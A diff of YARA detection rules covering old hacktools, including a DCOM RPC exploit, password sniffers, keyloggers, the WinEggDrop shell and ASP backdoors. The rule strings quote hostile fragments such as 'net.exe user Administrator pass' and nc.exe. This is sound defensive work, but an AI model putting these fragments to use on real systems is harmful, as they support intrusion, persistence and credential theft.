 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "08bbe6312342b28b43201125bd8c518531de8082"
-		logic_hash = "226be7ea7b09b2b87eeec006c8054b9fb59eb8324def14a4a0db97f94fb39d62"
-		score = 75
+		hash = "03367ad891b1580cfc864e8a03850368cbf3e0bb"
+		logic_hash = "be7d956333107a57a0fd86c69fc9eabcd3d9daf3f66385c44ba246fc2000dc4d"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "- Rewritten by HDM last <hdm [at] metasploit.com>" fullword ascii
-		$s2 = "- Usage: %s <Target ID> <Target IP>" fullword ascii
-		$s3 = "- Remote DCOM RPC Buffer Overflow Exploit" fullword ascii
-		$s4 = "- Warning:This Code is more like a dos tool!(Modify by pingker)" fullword ascii
-		$s5 = "Windows NT SP6 (Chinese)" fullword ascii
-		$s6 = "- Original code by FlashSky and Benjurry" fullword ascii
-		$s7 = "\\C$\\123456111111111111111.doc" wide
-		$s8 = "shell3all.c" fullword ascii
+		$s1 = "response.write \"<a href='index.asp'>" fullword ascii
+		$s3 = "if Request.Cookies(\"password\")=\"" ascii
+		$s6 = "whichdir=server.mappath(Request(\"path\"))" fullword ascii
+		$s7 = "Set fs = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+		$s19 = "whichdir=Request(\"path\")" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Isdebug_V1_4 : FILE
+rule SIGNATURE_BASE_Bypassfirewall_Zip_Folder_Ie
 {
 	meta:
-		description = "Chinese Hacktool Set - file IsDebug V1.4.dll"
+		description = "Disclosed hacktool set (old stuff) - file Ie.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f9b4a909-e0e5-5708-8794-39250b9d56cc"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L990-L1010"
+		id = "7bd10fa1-be2d-5882-b4c7-b696612343e5"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1807-L1823"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ca32474c358b4402421ece1cb31714fbb088b69a"
-		logic_hash = "d656327c33533b5ef7dc70ec00250ee35d878794fae189829a0ecad958f96616"
-		score = 75
+		hash = "d1b9058f16399e182c9b78314ad18b975d882131"
+		logic_hash = "844e260870f075b0afae0667691e61ab8f138a29871f9a18d1f2b623f9bb9e2a"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "IsDebug.dll" fullword ascii
-		$s1 = "SV Dumper V1.0" fullword wide
-		$s2 = "(IsDebuggerPresent byte Patcher)" fullword ascii
-		$s8 = "Error WriteMemory failed" fullword ascii
-		$s9 = "IsDebugPresent" fullword ascii
-		$s10 = "idb_Autoload" fullword ascii
-		$s11 = "Bin Files" fullword ascii
-		$s12 = "MASM32 version" fullword ascii
+		$s0 = "d:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dll" fullword ascii
+		$s1 = "LOADER ERROR" fullword ascii
+		$s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		$s7 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_HTTPSCANNER : FILE
+rule SIGNATURE_BASE_Editkeylogreadme
 {
 	meta:
-		description = "Chinese Hacktool Set - file HTTPSCANNER.EXE"
+		description = "Disclosed hacktool set (old stuff) - file EditKeyLogReadMe.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "470c90f5-bb98-59ab-bff4-f6238c318e36"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1012-L1026"
+		id = "db083c04-9e5c-5cfd-b4d4-eecf28191b6b"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1825-L1843"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ae2929346944c1ea3411a4562e9d5e2f765d088a"
-		logic_hash = "0f1460101198d8b139b7cc0674bef2fc7b3d2a24249f521396b7bbe4318a83d5"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		hash = "dfa90540b0e58346f4b6ea12e30c1404e15fbe5a"
+		logic_hash = "a58a2336e7d714a2e7f60eec8dacbee9a7190552dd791d8b6eba084ffaf0904a"
+		score = 60
+		quality = 35
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "HttpScanner.exe" fullword wide
-		$s2 = "HttpScanner" fullword wide
+		$s0 = "editKeyLog.exe KeyLog.exe," fullword ascii
+		$s1 = "WinEggDrop.DLL" fullword ascii
+		$s2 = "nc.exe" fullword ascii
+		$s3 = "KeyLog.exe" fullword ascii
+		$s4 = "EditKeyLog.exe" fullword ascii
+		$s5 = "wineggdrop" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3500KB and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_Hscan_V1_20_Pipecmd : FILE
+rule SIGNATURE_BASE_Passsniffer_Zip_Folder_Readme
 {
 	meta:
-		description = "Chinese Hacktool Set - file PipeCmd.exe"
+		description = "Disclosed hacktool set (old stuff) - file readme.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "957a8e3b-5f6c-5f3e-8973-88259c9cb0dc"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1028-L1049"
+		id = "f5965aa8-0f78-56fd-8e3e-6dc013942cb3"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1845-L1860"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "64403ce63b28b544646a30da3be2f395788542d6"
-		logic_hash = "91ed275896c2520893ba1af26b2563c0bd3564a9c5f9d812f35464469e27307b"
-		score = 75
+		hash = "a52545ae62ddb0ea52905cbb61d895a51bfe9bcd"
+		logic_hash = "d9e6cd2ba7e98481664b0560184a07349bb471dd370c4b73ef5f5f05a8e89946"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%SystemRoot%\\system32\\PipeCmdSrv.exe" fullword ascii
-		$s2 = "PipeCmd.exe" fullword wide
-		$s3 = "Please Use NTCmd.exe Run This Program." fullword ascii
-		$s4 = "%s\\pipe\\%s%s%d" fullword ascii
-		$s5 = "\\\\.\\pipe\\%s%s%d" fullword ascii
-		$s6 = "%s\\ADMIN$\\System32\\%s%s" fullword ascii
-		$s7 = "This is a service executable! Couldn't start directly." fullword ascii
-		$s8 = "Connecting to Remote Server ...Failed" fullword ascii
-		$s9 = "PIPECMDSRV" fullword wide
+		$s0 = "PassSniffer.exe" fullword ascii
+		$s1 = "POP3/FTP Sniffer" fullword ascii
+		$s2 = "Password Sniffer V1.0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 4 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Dos_Fp : FILE
+rule SIGNATURE_BASE_Sig_238_Gina
 {
 	meta:
-		description = "Chinese Hacktool Set - file fp.exe"
+		description = "Disclosed hacktool set (old stuff) - file gina.reg"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f4427aab-50c3-5bb9-997a-75e162a83f8a"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1051-L1067"
+		id = "85c19493-e6d4-55e8-8526-6817243e90cf"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1862-L1877"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"
-		logic_hash = "cc09743269ee36862c95c9323ad271ca9b6c350cf25163d126fef0f86bc6f671"
-		score = 75
+		hash = "324acc52566baf4afdb0f3e4aaf76e42899e0cf6"
+		logic_hash = "f0ece7406a31f5a4212da5c4144233c5c45b8120d09267fdf7e291d6c9827384"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "fpipe -l 53 -s 53 -r 80 192.168.1.101" fullword ascii
-		$s2 = "FPipe.exe" fullword wide
-		$s3 = "http://www.foundstone.com" fullword ascii
-		$s4 = "%s %s port %d. Address is already in use" fullword ascii
+		$s0 = "\"gina\"=\"gina.dll\"" fullword ascii
+		$s1 = "REGEDIT4" fullword ascii
+		$s2 = "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 65KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Dos_Netstat : FILE
+rule SIGNATURE_BASE_Splitjoin
 {
 	meta:
-		description = "Chinese Hacktool Set - file netstat.exe"
+		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bc3141bf-4e82-5aa4-a8a6-a0a4586ee9a1"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1069-L1085"
+		id = "2f1a69cd-34b3-5af0-a054-fe19d9becb25"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1879-L1895"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d0444b7bd936b5fc490b865a604e97c22d97e598"
-		logic_hash = "e2b908308616c3f2c94849b4f22f0e9bb130b5759d89161604505ff25681be55"
-		score = 75
+		hash = "e4a9ef5d417038c4c76b72b5a636769a98bd2f8c"
+		logic_hash = "dede4518ed9be28e89bc67dab4e68503383c16746f088f37a4c8069e256183ca"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "w03a2409.dll" fullword ascii
-		$s1 = "Retransmission Timeout Algorithm    = unknown (%1!u!)" fullword wide
-		$s2 = "Administrative Status  = %1!u!" fullword wide
-		$s3 = "Packet Too Big            %1!-10u!  %2!-10u!" fullword wide
+		$s0 = "Not for distribution without the authors permission" fullword wide
+		$s2 = "Utility to split and rejoin files.0" fullword wide
+		$s5 = "Copyright (c) Angus Johnson 2001-2002" fullword wide
+		$s19 = "SplitJoin" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Tools_Xsniff : FILE
+rule SIGNATURE_BASE_Editkeylog
 {
 	meta:
-		description = "Chinese Hacktool Set - file xsniff.exe"
+		description = "Disclosed hacktool set (old stuff) - file EditKeyLog.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a0fdac88-a7b8-5d24-9012-2bfe7b07e675"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1087-L1104"
+		id = "db083c04-9e5c-5cfd-b4d4-eecf28191b6b"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1897-L1913"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d61d7329ac74f66245a92c4505a327c85875c577"
-		logic_hash = "a32d07ecd635ad71edaa37d9b1e5f66d8ce5a7f84f1bba6eb06deb1f49a879c8"
-		score = 75
+		hash = "a450c31f13c23426b24624f53873e4fc3777dc6b"
+		logic_hash = "0efb173598117857c5bf7894f017d655653e843dd0a44439d1b10b7e5c59b248"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "xsiff.exe -pass -hide -log pass.log" fullword ascii
-		$s1 = "HOST: %s USER: %s, PASS: %s" fullword ascii
-		$s2 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii
-		$s10 = "Code by glacier <glacier@xfocus.org>" fullword ascii
-		$s11 = "%-5s%s->%s Bytes=%d TTL=%d Type: %d,%d ID=%d SEQ=%d" fullword ascii
+		$s1 = "Press Any Ke" fullword ascii
+		$s2 = "Enter 1 O" fullword ascii
+		$s3 = "Bon >0 & <65535L" fullword ascii
+		$s4 = "--Choose " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 220KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Mssqlpass : FILE
+rule SIGNATURE_BASE_Passsniffer
 {
 	meta:
-		description = "Chinese Hacktool Set - file MSSqlPass.exe"
+		description = "Disclosed hacktool set (old stuff) - file PassSniffer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d45b417f-3649-5603-bd19-8b8bcc19dabc"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1106-L1121"
+		id = "f5965aa8-0f78-56fd-8e3e-6dc013942cb3"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1915-L1933"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "172b4e31ed15d1275ac07f3acbf499daf9a055d7"
-		logic_hash = "8037316eb157f8693bd342911af5fe5292f3ef8a3c169c80bc70edbabd7a92e6"
-		score = 75
+		hash = "dcce4c577728e8edf7ed38ac6ef6a1e68afb2c9f"
+		logic_hash = "771b45473c48618c43c6be84dd37b2ccb23643f1674d437763cb78ce560067c0"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Reveals the passwords stored in the Registry by Enterprise Manager of SQL Server" wide
-		$s1 = "empv.exe" fullword wide
-		$s2 = "Enterprise Manager PassView" fullword wide
+		$s2 = "Sniff" fullword ascii
+		$s3 = "GetLas" fullword ascii
+		$s4 = "VersionExA" fullword ascii
+		$s10 = " Only RuntUZ" fullword ascii
+		$s12 = "emcpysetprintf\\" ascii
+		$s13 = "WSFtartup" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 120KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Wsockexpert : FILE
+rule SIGNATURE_BASE_Aspfile2
 {
 	meta:
-		description = "Chinese Hacktool Set - file WSockExpert.exe"
+		description = "Disclosed hacktool set (old stuff) - file aspfile2.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0ae115be-c516-5f4a-97ce-555d84f42947"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1123-L1141"
+		id = "42bbcc16-a6d7-53d7-8651-1a28c6b26ee8"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1935-L1951"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2962bf7b0883ceda5e14b8dad86742f95b50f7bf"
-		logic_hash = "34ac3c5f0651ccab851d67da8863e0e305f981cf53a06d46c23f19736cc1c400"
-		score = 75
+		hash = "14efbc6cb01b809ad75a535d32b9da4df517ff29"
+		logic_hash = "0fd52e646751b14840f30100382c5171fd001c05110dccb4ac87be9b2c4b6131"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "OpenProcessCmdExecute!" fullword ascii
-		$s2 = "http://www.hackp.com" fullword ascii
-		$s3 = "'%s' is not a valid time!'%s' is not a valid date and time" fullword wide
-		$s4 = "SaveSelectedFilterCmdExecute" fullword ascii
-		$s5 = "PasswordChar@" fullword ascii
-		$s6 = "WSockHook.DLL" fullword ascii
+		$s0 = "response.write \"command completed success!\" " fullword ascii
+		$s1 = "for each co in foditems " fullword ascii
+		$s3 = "<input type=text name=text6 value=\"<%= szCMD6 %>\"><br> " fullword ascii
+		$s19 = "<title>Hello! Welcome </title>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2500KB and 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Ms_Viru_Racle : FILE
+rule SIGNATURE_BASE_Unpack_Rar_Folder_Injectt
 {
 	meta:
-		description = "Chinese Hacktool Set - file racle.dll"
+		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bdc78dcc-79e6-5516-bba2-54bf537eae38"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1143-L1159"
+		id = "cc7d1a36-1214-5a14-8589-9eb2339a8700"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1953-L1976"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "13116078fff5c87b56179c5438f008caf6c98ecb"
-		logic_hash = "d36db04c6a62a72e9f3079d09aedc9056c0a5032b4594af4d02ba55373f8b6a4"
-		score = 75
+		hash = "80f39e77d4a34ecc6621ae0f4d5be7563ab27ea6"
+		logic_hash = "f9d682a9438f49cf8292c33e680537d8c2137b8cba2670430b92d0a620de85b9"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "PsInitialSystemProcess @%p" fullword ascii
-		$s1 = "PsLookupProcessByProcessId(%u) Failed" fullword ascii
-		$s2 = "PsLookupProcessByProcessId(%u) => %p" fullword ascii
-		$s3 = "FirstStage() Loaded, CurrentThread @%p Stack %p - %p" fullword ascii
+		$s0 = "%s -Install                          -->To Install The Service" fullword ascii
+		$s1 = "Explorer.exe" fullword ascii
+		$s2 = "%s -Start                            -->To Start The Service" fullword ascii
+		$s3 = "%s -Stop                             -->To Stop The Service" fullword ascii
+		$s4 = "The Port Is Out Of Range" fullword ascii
+		$s7 = "Fail To Set The Port" fullword ascii
+		$s11 = "\\psapi.dll" ascii
+		$s20 = "TInject.Dll" fullword ascii
+		$x1 = "Software\\Microsoft\\Internet Explorer\\WinEggDropShell" fullword ascii
+		$x2 = "injectt.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 210KB and all of them
+		(1 of ( $x* ) ) and ( 3 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Lamescan3 : FILE
+rule SIGNATURE_BASE_Jc_Wineggdrop_Shell
 {
 	meta:
-		description = "Chinese Hacktool Set - file lamescan3.exe"
+		description = "Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8ff1a0e6-d054-589d-a038-f889951ba250"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1161-L1177"
+		id = "219df3a1-fe1c-5d33-ab3e-1b3cbd104c9e"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1978-L1997"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3130eefb79650dab2e323328b905e4d5d3a1d2f0"
-		logic_hash = "8246128fa4378b0479a0c051965188c7c3fa0f52c8acc8934ef8af3155a85590"
-		score = 75
+		hash = "820674b59f32f2cf72df50ba4411d7132d863ad2"
+		logic_hash = "af43980b4052cef56884e9d6bdbb12919f1a86420a3f189e30fba624ab37a420"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "dic\\loginlist.txt" fullword ascii
-		$s2 = "Radmin.exe" fullword ascii
-		$s3 = "lamescan3.pdf!" fullword ascii
-		$s4 = "dic\\passlist.txt" fullword ascii
+		$s0 = "Sniffer.dll" fullword ascii
+		$s4 = ":Execute net.exe user Administrator pass" fullword ascii
+		$s5 = "Fport.exe or mport.exe " fullword ascii
+		$s6 = ":Password Sniffering Is Running |Not Running " fullword ascii
+		$s9 = ": The Terminal Service Port Has Been Set To NewPort" fullword ascii
+		$s15 = ": Del www.exe                   " fullword ascii
+		$s20 = ":Dir *.exe                    " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3740KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Tools_Pc : FILE
+rule SIGNATURE_BASE_Aspbackdoor_Asp1
 {
 	meta:
-		description = "Chinese Hacktool Set - file pc.exe"
+		description = "Disclosed hacktool set (old stuff) - file asp1.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "11cc6c46-33c0-5c53-88f8-700be9ca8add"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1179-L1195"
+		id = "fa5128c5-efd5-55dd-880a-2952942e2035"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1999-L2017"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5cf8caba170ec461c44394f4058669d225a94285"
-		logic_hash = "1da263362e4c2ec8194bb80bfc3f25ff8c4b708919ba02ea02687d5404b99720"
-		score = 75
+		hash = "9ef9f34392a673c64525fcd56449a9fb1d1f3c50"
+		logic_hash = "7ce1911d7524e9961f907f863b3966817bcad7a571c933dac6a76e1d8a1eeaf8"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\svchost.exe" ascii
-		$s2 = "%s%08x.001" fullword ascii
-		$s3 = "Qy001Service" fullword ascii
-		$s4 = "/.MIKY" fullword ascii
+		$s0 = "param = \"driver={Microsoft Access Driver (*.mdb)}\" " fullword ascii
+		$s1 = "conn.Open param & \";dbq=\" & Server.MapPath(\"scjh.mdb\") " fullword ascii
+		$s6 = "set rs=conn.execute (sql)%> " fullword ascii
+		$s7 = "<%set Conn = Server.CreateObject(\"ADODB.Connection\") " fullword ascii
+		$s10 = "<%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh " fullword ascii
+		$s15 = "sql=\"select * from scjh\" " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Dos_Down64 : FILE
+rule SIGNATURE_BASE_QQ_Zip_Folder_QQ
 {
 	meta:
-		description = "Chinese Hacktool Set - file Down64.exe"
+		description = "Disclosed hacktool set (old stuff) - file QQ.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b4907ede-dc6a-5b8c-bf1c-557df54191a4"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1197-L1215"
+		id = "30da6292-f670-5b73-985a-3028e20607be"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2019-L2039"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "43e455e43b49b953e17a5b885ffdcdf8b6b23226"
-		logic_hash = "d181c2075762fc3bb5b61bcdef57eb6533cb59dde03c4b901b6ce5b8323f3c8a"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		hash = "9f8e3f40f1ac8c1fa15a6621b49413d815f46cfb"
+		logic_hash = "d2517c3646b9a3babfa767c5c57b4b576fda471c190ab66e1054c4de359713ad"
+		score = 60
+		quality = 35
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "C:\\Windows\\Temp\\Down.txt" fullword wide
-		$s2 = "C:\\Windows\\Temp\\Cmd.txt" fullword wide
-		$s3 = "C:\\Windows\\Temp\\" wide
-		$s4 = "ProcessXElement" fullword ascii
-		$s8 = "down.exe" fullword wide
-		$s20 = "set_Timer1" fullword ascii
+		$s0 = "EMAIL:haoq@neusoft.com" fullword wide
+		$s1 = "EMAIL:haoq@neusoft.com" fullword wide
+		$s4 = "QQ2000b.exe" fullword wide
+		$s5 = "haoq@neusoft.com" fullword ascii
+		$s9 = "QQ2000b.exe" fullword ascii
+		$s10 = "\\qq2000b.exe" ascii
+		$s12 = "WINDSHELL STUDIO[WINDSHELL " fullword wide
+		$s17 = "SOFTWARE\\HAOQIANG\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
+		5 of them
 }
-rule SIGNATURE_BASE_Epathobj_Exp32 : FILE
+rule SIGNATURE_BASE_Unpack_Rar_Folder_Tback
 {
 	meta:
-		description = "Chinese Hacktool Set - file epathobj_exp32.exe"
+		description = "Disclosed hacktool set (old stuff) - file TBack.DLL"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ca4639af-ee4f-5220-9595-e7a06b9a8534"
-		date = "2015-06-13"
-		modified = "2022-12-21"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1217-L1235"
+		id = "f672f987-0d43-53df-8338-084907b6da16"
